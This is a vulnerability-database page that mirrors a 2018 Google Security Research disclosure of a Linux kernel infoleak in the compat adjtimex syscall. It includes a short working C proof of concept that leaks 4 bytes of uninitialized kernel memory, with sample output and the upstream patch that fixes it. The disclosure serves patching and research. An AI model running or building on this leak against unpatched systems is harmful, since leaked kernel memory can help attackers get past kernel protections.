Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field Exploit

🗓️ 18 May 2018 00:00:00Reported by Google Security ResearchType 
zdt
 zdt🔗 0day.today👁 35 Views

Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field Exploit. The vulnerability allows an uninitialized ->tai field to be copied to userspace

Code
/*
Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall
Commit 3a4d44b61625 ("ntp: Move adjtimex related compat syscalls to native
counterparts") removed the memset() in compat_get_timex(). Since then, the
compat adjtimex syscall can invoke do_adjtimex() with an uninitialized
->tai. If do_adjtimex() doesn't write to ->tai (e.g. because the arguments
are invalid), compat_put_timex() then copies the uninitialized ->tai field
to userspace.
 
Demo:
 
 
$ cat leak_32.c
*/
 
#include <sys/timex.h>
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdint.h>
#include <err.h>
 
/* from include/linux/timex.h */
#define ADJ_ADJTIME 0x8000
 
int main(void) {
  struct timex tx;
  memset(&tx, 0, sizeof(tx));
  tx.modes = ADJ_ADJTIME; /* invalid, causes early bailout */
  int res = adjtimex(&tx);
  assert(res == -1 && errno == EINVAL);
  printf("0x%08x\n", (unsigned int)tx.tai);
  return 0;
}
 
/*
$ gcc -o leak_32 leak_32.c -Wall -m32
$ for i in {0..10}; do sleep 1; ./leak_32; done
0x01a300b0
0x0be8f6f0
0x0610d5f0
0x01fa0170
0x0bf05670
0x0bf05670
0x0610d5f0
0x0610cd70
0x0610d5f0
0x0610d5f0
 
 
Fixed in master: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a0b98734479aa5b3c671d5190e86273372cab95
 
 
Fix it by adding the memset() back.
 
Fixes: 3a4d44b61625 ("ntp: Move adjtimex related compat syscalls to native counterparts")
Signed-off-by: Jann Horn <[email protected]>
---
 kernel/compat.c | 1 +
 1 file changed, 1 insertion(+)
 
diff --git a/kernel/compat.c b/kernel/compat.c
index 6d21894806b4..92d8c98c0f57 100644
--- a/kernel/compat.c
+++ b/kernel/compat.c
@@ -34,6 +34,7 @@ int compat_get_timex(struct timex *txc, const struct compat_timex __user *utp)
 {
    struct compat_timex tx32;
  
+   memset(txc, 0, sizeof(struct timex));
    if (copy_from_user(&tx32, utp, sizeof(struct compat_timex)))
        return -EFAULT;
  
-- 
2.17.0.441.gb46fe60e1d-goog
*/

#  0day.today [2018-05-18]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 May 2018 00:00Current
0.2Low risk
Vulners AI Score0.2
linux kernelinfoleak vulnerabilityuninitialized struct field
35